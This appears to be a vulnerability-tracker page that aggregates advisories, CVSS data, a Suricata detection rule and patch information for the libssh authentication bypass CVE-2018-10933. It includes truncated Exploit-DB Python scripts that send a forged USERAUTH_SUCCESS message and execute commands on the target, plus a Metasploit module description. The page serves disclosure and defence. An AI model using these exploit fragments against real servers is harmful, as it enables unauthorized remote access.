CVE-2018-10933
published 2018-10-17CVE-2018-10933: A vulnerability was found in libssh's server-side state machine before versions 0.7.6 and 0.8.4. A malicious client could create channels without first…
PriorityP183critical9.1CVSS 3.0
AVNACLPRNUINSUCHIHAN
EXPLOIT
EPSS
91.79%
99.8th percentile
A vulnerability was found in libssh's server-side state machine before versions 0.7.6 and 0.8.4. A malicious client could create channels without first performing authentication, resulting in unauthorized access.
Affected
17 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| debian | debian_linux | — | — |
| debian | debian_linux | — | — |
| debian | libssh | < libssh 0.8.4-1 (bookworm) | libssh 0.8.4-1 (bookworm) |
| libssh | libssh | >= 0 < 0.8.4-1 | 0.8.4-1 |
| libssh | libssh | >= 0 < 0.8.4-1 | 0.8.4-1 |
| libssh | libssh | >= 0 < 0.8.4-1 | 0.8.4-1 |
| libssh | libssh | >= 0 < 0.8.4-1 | 0.8.4-1 |
| libssh | libssh | >= 0.6.0 < 0.7.6 | 0.7.6 |
| libssh | libssh | >= 0.8.0 < 0.8.4 | 0.8.4 |
| netapp | oncommand_unified_manager | >= 7.3 | — |
| netapp | oncommand_unified_manager | >= 9.4 | — |
| oracle | mysql_workbench | <= 8.0.13 | — |
| redhat | enterprise_linux | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Vulnerable targets must be running libssh in server mode (not client mode); scope detection and patching efforts to server-mode deployments of libssh versions 0.6.0–0.7.5 and 0.8.0–0.8.3. ↗
- →The Metasploit auxiliary module scanner/ssh/libssh_auth_bypass can be used to confirm exploitability; successful exploitation results in an authenticated shell session without credentials being provided. ↗
- →The exploit technique involves sending a response message (normally server→client) back to the server — monitor for role-reversed SSH message flows as a detection signal. ↗
- ·Only libssh deployments operating in server mode are vulnerable; client-mode libssh is not affected, which significantly limits the exploitable attack surface. ↗
- ·Metasploit module success is not guaranteed even against vulnerable hosts — the server must trigger the correct shell/exec callbacks after the state machine's authenticated state is set. ↗
CVSS provenance
nvdv3.09.1CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
nvdv2.06.4MEDIUMAV:N/AC:L/Au:N/C:P/I:P/A:N
osv9.1CRITICAL
vendor_debian9.1CRITICAL
vendor_redhat9.1CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA ICS
Hitachi ABB Power Grids FOX615 Multiservice-Multiplexer
cisa_ics·2021-01-07·CVSS 9.1
[CRITICAL] Hitachi ABB Power Grids FOX615 Multiservice-Multiplexer
## Archived Content In an effort to keep CISA.gov current, the archive contains outdated information that may not reflect current policy or programs.
ICS Advisory
##
Hitachi ABB Power Grids FOX615 Multiservice-Multiplexer
Last RevisedJanuary 07, 2021
Alert CodeICSA-21-007-01
## 1. EXECUTIVE SUMMARY
- CVSS v3 9.1
- ATTENTION: Exploitable remotely/low skill level to exploit
- Vendor: Hitachi ABB Power Grids
- Equipment: FOX615 Multiservice-Multiplexer
- Vulnerability: Improper Authentication
## 2. RISK EVALUATION
Successful exploitation of this vulnerability could allow an attacker remote access to the device without authentication.
## 3. TECHNICAL DETAILS
## 3.1 AFFECTED PRODUCTS
Hitachi ABB Power Grids reports a vulnerability exists
CISA ICS
Hitachi ABB Power Grids XMC20 Multiservice-Multiplexer
cisa_ics·2020-10-20·CVSS 9.1
[CRITICAL] Hitachi ABB Power Grids XMC20 Multiservice-Multiplexer
## Archived Content In an effort to keep CISA.gov current, the archive contains outdated information that may not reflect current policy or programs.
ICS Advisory
##
Hitachi ABB Power Grids XMC20 Multiservice-Multiplexer
Last RevisedOctober 20, 2020
Alert CodeICSA-20-294-02
## 1. EXECUTIVE SUMMARY
- CVSS v3 9.1
- ATTENTION: Exploitable remotely/low skill level to exploit
- Vendor: Hitachi ABB Power Grids
- Equipment: XMC20 Multiservice-Multiplexer
- Vulnerability: Improper Authentication
## 2. RISK EVALUATION
Successful exploitation of this vulnerability could allow an attacker to remotely take control of the product.
## 3. TECHNICAL DETAILS
## 3.1 AFFECTED PRODUCTS
Hitachi ABB Power Grids reports the vulnerability affects the follo
Ubuntu
libssh vulnerability
vendor_ubuntu·2018-10-22
CVE-2018-10933 libssh vulnerability
Title: libssh vulnerability
Summary: libssh could allow unintended access to network services.
USN-3795-1 fixed a vulnerability in libssh. This update provides the
corresponding update for Ubuntu 18.10.
Original advisory details:
Peter Winter-Smith discovered that libssh incorrectly handled
authentication when being used as a server. A remote attacker could use
this issue to bypass authentication without any credentials.
Instructions: After a standard system update you need to reboot your computer to make
all the necessary changes.
Cisco
libssh Authentication Bypass Vulnerability Affecting Cisco Products: October 2018
vendor_cisco·2018-10-19
CVE-2018-10933 [CRITICAL] CWE-287 libssh Authentication Bypass Vulnerability Affecting Cisco Products: October 2018
libssh Authentication Bypass Vulnerability Affecting Cisco Products: October 2018
A vulnerability in libssh could allow an unauthenticated, remote attacker to bypass authentication on a targeted system.
The vulnerability is due to improper authentication operations by the server-side state machine of the affected software. An attacker could exploit this vulnerability by presenting a SSH2_MSG_USERAUTH_SUCCESS message to a targeted system. A successful exploit could allow the attacker to bypass authentication and gain unauthorized access to a targeted system.
This advisory is available at the following link:
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181019-libssh
Ubuntu
libssh vulnerability
vendor_ubuntu·2018-10-17
CVE-2018-10933 libssh vulnerability
Title: libssh vulnerability
Summary: libssh could allow unintended access to network services.
Peter Winter-Smith discovered that libssh incorrectly handled
authentication when being used as a server. A remote attacker could use
this issue to bypass authentication without any credentials.
Instructions: After a standard system update you need to reboot your computer to make
all the necessary changes.
Red Hat
libssh: Authentication Bypass due to improper message callbacks implementation
vendor_redhat·2018-10-16·CVSS 9.1
CVE-2018-10933 [CRITICAL] CWE-287 libssh: Authentication Bypass due to improper message callbacks implementation
libssh: Authentication Bypass due to improper message callbacks implementation
A vulnerability was found in libssh's server-side state machine before versions 0.7.6 and 0.8.4. A malicious client could create channels without first performing authentication, resulting in unauthorized access.
A vulnerability was found in libssh's server-side state machine. A malicious client could create channels without first performing authentication, resulting in unauthorized access.
Statement: This vulnerability affects libssh shipped in Red Hat Enterprise Linux 7 Extras. No libssh packages are included in Red Hat Enterprise Linux 6 and earlier. This issue does not affect libssh2 or openssh.
This issue can only be affect applications that use libssh to implement an SSH server; SSH client functionality
Debian
CVE-2018-10933: libssh - A vulnerability was found in libssh's server-side state machine before versions ...
vendor_debian·2018·CVSS 9.1
CVE-2018-10933 [CRITICAL] CVE-2018-10933: libssh - A vulnerability was found in libssh's server-side state machine before versions ...
A vulnerability was found in libssh's server-side state machine before versions 0.7.6 and 0.8.4. A malicious client could create channels without first performing authentication, resulting in unauthorized access.
Scope: local
bookworm: resolved (fixed in 0.8.4-1)
bullseye: resolved (fixed in 0.8.4-1)
forky: resolved (fixed in 0.8.4-1)
sid: resolved (fixed in 0.8.4-1)
trixie: resolved (fixed in 0.8.4-1)
Cisco
libssh Authentication Bypass Vulnerability Affecting Cisco Products: October 2018
vendor_cisco
CVE-2018-10933 libssh Authentication Bypass Vulnerability Affecting Cisco Products: October 2018
CVE-2018-10933: libssh Authentication Bypass Vulnerability Affecting Cisco Products: October 2018
A vulnerability in libssh could allow an unauthenticated, remote attacker to bypass authentication on a targeted system. The vulnerability is due to improper authentication operations by the server-side state machine of the affected software. An attacker could exploit this vulnerability by presenting a SSH2_MSG_USERAUTH_SUCCESS message to a targeted system. A successful exploit could allow the attacker to bypass authentication and gain unauthorized access to a targeted system. This advisory is available at the following link: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181019-libssh
CWE: CWE-287, CWE-287
GHSA
GHSA-22gf-f5w4-hrfq: A vulnerability was found in libssh's server-side state machine before versions 0
ghsa_unreviewed·2022-05-13
CVE-2018-10933 [CRITICAL] CWE-287 GHSA-22gf-f5w4-hrfq: A vulnerability was found in libssh's server-side state machine before versions 0
A vulnerability was found in libssh's server-side state machine before versions 0.7.6 and 0.8.4. A malicious client could create channels without first performing authentication, resulting in unauthorized access.
OSV
CVE-2018-10933: A vulnerability was found in libssh's server-side state machine before versions 0
osv·2018-10-17·CVSS 9.1
CVE-2018-10933 [CRITICAL] CVE-2018-10933: A vulnerability was found in libssh's server-side state machine before versions 0
A vulnerability was found in libssh's server-side state machine before versions 0.7.6 and 0.8.4. A malicious client could create channels without first performing authentication, resulting in unauthorized access.
Suricata
ET INFO Potentially Vulnerable LibSSH Server Observed - Possible Authentication Bypass (CVE-2018-10933)
suricata·2018-10-19·CVSS 9.1
CVE-2018-10933 [CRITICAL] ET INFO Potentially Vulnerable LibSSH Server Observed - Possible Authentication Bypass (CVE-2018-10933)
ET INFO Potentially Vulnerable LibSSH Server Observed - Possible Authentication Bypass (CVE-2018-10933)
Rule: alert tcp $EXTERNAL_NET $SSH_PORTS -> any any (msg:"ET INFO Potentially Vulnerable LibSSH Server Observed - Possible Authentication Bypass (CVE-2018-10933)"; flow:established,to_client; content:"SSH-2.0-libssh-0."; depth:17; pcre:"/^[67]\.[01235]/R"; reference:url,www.libssh.org/security/advisories/CVE-2018-10933.txt; reference:url,github.com/blacknbunny/libSSH-Authentication-Bypass; reference:cve,2018-10933; classtype:bad-unknown; sid:2026526; rev:2; metadata:created_at 2018_10_19, cve CVE_2018_10933, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag CVE_2018_10933, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_07, mitre
Exploit-DB
LibSSH 0.7.6 / 0.8.4 - Unauthorized Access
exploitdb·2018-10-20
CVE-2018-10933 LibSSH 0.7.6 / 0.8.4 - Unauthorized Access
LibSSH 0.7.6 / 0.8.4 - Unauthorized Access
---
#!/usr/bin/env python3
import sys
import paramiko
import socket
import logging
# pip3 install paramiko==2.0.8
#logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
logging.basicConfig(stream=sys.stdout)
bufsize = 2048
def execute(hostname, port, command):
sock = socket.socket()
try:
sock.connect((hostname, int(port)))
message = paramiko.message.Message()
transport = paramiko.transport.Transport(sock)
transport.start_client()
message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
transport._send_message(message)
client = transport.open_session(timeout=10)
client.exec_command(command)
# stdin = client.makefile("wb", bufsize)
stdout = client.makefile("rb", bufsize)
stderr = client.makefile_stderr("rb", bufsize)
output = stdout.
Exploit-DB
libSSH - Authentication Bypass
exploitdb·2018-10-18
CVE-2018-10933 libSSH - Authentication Bypass
libSSH - Authentication Bypass
---
#!/usr/bin/env python3
import paramiko
import socket
import argparse
from sys import argv, exit
parser = argparse.ArgumentParser(description="libSSH Authentication Bypass")
parser.add_argument('--host', help='Host')
parser.add_argument('-p', '--port', help='libSSH port', default=22)
parser.add_argument('-log', '--logfile', help='Logfile to write conn logs', default="paramiko.log")
args = parser.parse_args()
def BypasslibSSHwithoutcredentials(hostname, port):
sock = socket.socket()
try:
sock.connect((str(hostname), int(port)))
message = paramiko.message.Message()
transport = paramiko.transport.Transport(sock)
transport.start_client()
message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
transport._send_message(message)
spawncmd = transport.ope
Metasploit
libssh Authentication Bypass Scanner
metasploit
libssh Authentication Bypass Scanner
libssh Authentication Bypass Scanner
This module exploits an authentication bypass in libssh server code where a USERAUTH_SUCCESS message is sent in place of the expected USERAUTH_REQUEST message. libssh versions 0.6.0 through 0.7.5 and 0.8.0 through 0.8.3 are vulnerable. Note that this module's success depends on whether the server code can trigger the correct (shell/exec) callbacks despite only the state machine's authenticated state being set. Therefore, you may or may not get a shell if the server requires additional code paths to be followed.
Tenable
Cisco Small Business Switch Security Feature Bypass
blogs_tenable·2019-05-01
Cisco Small Business Switch Security Feature Bypass
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Tenable
Oracle’s January Critical Patch Update Addresses Nearly 300 Fixes
blogs_tenable·2019-01-15
Oracle’s January Critical Patch Update Addresses Nearly 300 Fixes
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Tenable
Oracle’s January Critical Patch Update Addresses Nearly 300 Fixes
blogs_tenable·2019-01-15·CVSS 9.8
[CRITICAL] Oracle’s January Critical Patch Update Addresses Nearly 300 Fixes
Blog / Cyber Exposure Alerts
Subscribe
# Oracle’s January Critical Patch Update Addresses Nearly 300 Fixes
Satnam Narang
January 15, 2019
2 Min Read
Oracle addresses nearly 300 vulnerabilities in the first Critical Patch Update of 2019.
## Background
On January 15, Oracle released its Critical Patch Update, a quarterly publication of fixes for vulnerabilities. This month’s update contains nearly 300 fixes across a number of Oracle products.
## Analysis
The Critical Patch Update for January 2019 addresses a variety of vulnerabilities. For instance, Oracle published 30 fixes for MySQL, including a fix for MySQL Workbench to address the libssh vulnerability (CVE-2018-10933). There are also several fixes for CVE-2017-5645, a deserialization vulnerability in Apache Log4j, as well as CV
Tenable
libssh Vulnerable to Authentication Bypass (CVE-2018-10933)
blogs_tenable·2018-10-17·CVSS 9.1
CVE-2018-10933 [CRITICAL] libssh Vulnerable to Authentication Bypass (CVE-2018-10933)
Blog / Cyber Exposure Alerts
Subscribe
# libssh Vulnerable to Authentication Bypass (CVE-2018-10933)
Satnam Narang
October 17, 2018
2 Min Read
A newly announced vulnerability in libssh, a multiplatform library that supports the Secure Shell (SSH) protocol, allows attackers to bypass authentication and gain full control over vulnerable servers.
## Background
On October 16, the libssh team published an important security update for a vulnerability in libssh versions 0.6 and above. libssh is a multiplatform library written in C that supports the SSH protocol and can be used to implement client and server applications. The security update addresses CVE-2018-10933, an authentication bypass vulnerability. Tenable confirms our products are not vulnerable to CVE-2018-10933.
## Impact asses
Tenable
libssh Vulnerable to Authentication Bypass (CVE-2018-10933)
blogs_tenable·2018-10-17·CVSS 9.1
[CRITICAL] libssh Vulnerable to Authentication Bypass (CVE-2018-10933)
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
arXiv
Fuzzers for stateful systems: Survey and Research Directions
arxiv_fulltext·2023-01-06
Fuzzers for stateful systems: Survey and Research Directions
[Fuzzers for stateful systems]Fuzzers for stateful systems: Survey and Research Directions
Cristian Daniele
1234-5678-9012
[email protected]
Seyed Behnam Andarzian
[email protected]
1234-5678-9012
Erik Poll
1234-5678-9012
[email protected]
Radboud University
P.O. Box 1212
Nijmegen
The Netherlands
43017-6221
## Abstract
Fuzzing is a security testing methodology effective in finding bugs.
In a nutshell, a fuzzer sends multiple slightly malformed messages to the software under test, hoping for crashes or weird system behaviour.
The methodology is relatively simple, although applications that keep internal states are challenging to fuzz.
The research community has responded to this challenge by developing fuzzers tailored to stateful systems, but a clear understanding of th
Bugzilla
CVE-2018-10933 libssh: Authentication Bypass due to improper message callbacks implementation [fedora-all]
bugzilla·2018-10-16·CVSS 9.1
CVE-2018-10933 [CRITICAL] CVE-2018-10933 libssh: Authentication Bypass due to improper message callbacks implementation [fedora-all]
CVE-2018-10933 libssh: Authentication Bypass due to improper message callbacks implementation [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of fedora-all.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affect
Bugzilla
CVE-2018-10933 libssh: Authentication Bypass due to improper message callbacks implementation
bugzilla·2018-08-10·CVSS 9.1
CVE-2018-10933 [CRITICAL] CVE-2018-10933 libssh: Authentication Bypass due to improper message callbacks implementation
CVE-2018-10933 libssh: Authentication Bypass due to improper message callbacks implementation
A flaw was found in libSSH which can enable a client to bypass the authentication process and set the internal state machine maintained by the library to authenticated, enabling the (otherwise prohibited) creation of channels.
Discussion:
Acknowledgments:
Name: the libssh team
Upstream: Peter Winter-Smith (NCC Group)
---
Created libssh tracking bugs for this issue:
Affects: fedora-all [bug 1639925]
---
Upstream issue:
https://bugs.libssh.org/T101
---
External References:
https://www.libssh.org/security/advisories/CVE-2018-10933.txt
---
Statement:
This vulnerability affects libssh shipped in Red Hat Enterprise Linux 7 Extras. No libssh packages are included in Red Hat Enterprise Lin
http://www.securityfocus.com/bid/105677https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2018-10933https://lists.debian.org/debian-lts-announce/2018/10/msg00010.htmlhttps://psirt.global.sonicwall.com/vuln-detail/SNWLID-2018-0016https://security.netapp.com/advisory/ntap-20190118-0002/https://usn.ubuntu.com/3795-1/https://usn.ubuntu.com/3795-2/https://www.debian.org/security/2018/dsa-4322https://www.exploit-db.com/exploits/45638/https://www.libssh.org/security/advisories/CVE-2018-10933.txthttps://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.htmlhttp://www.securityfocus.com/bid/105677https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2018-10933https://lists.debian.org/debian-lts-announce/2018/10/msg00010.htmlhttps://psirt.global.sonicwall.com/vuln-detail/SNWLID-2018-0016https://security.netapp.com/advisory/ntap-20190118-0002/https://usn.ubuntu.com/3795-1/https://usn.ubuntu.com/3795-2/https://www.debian.org/security/2018/dsa-4322https://www.exploit-db.com/exploits/45638/https://www.libssh.org/security/advisories/CVE-2018-10933.txthttps://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html
2018-10-17
Published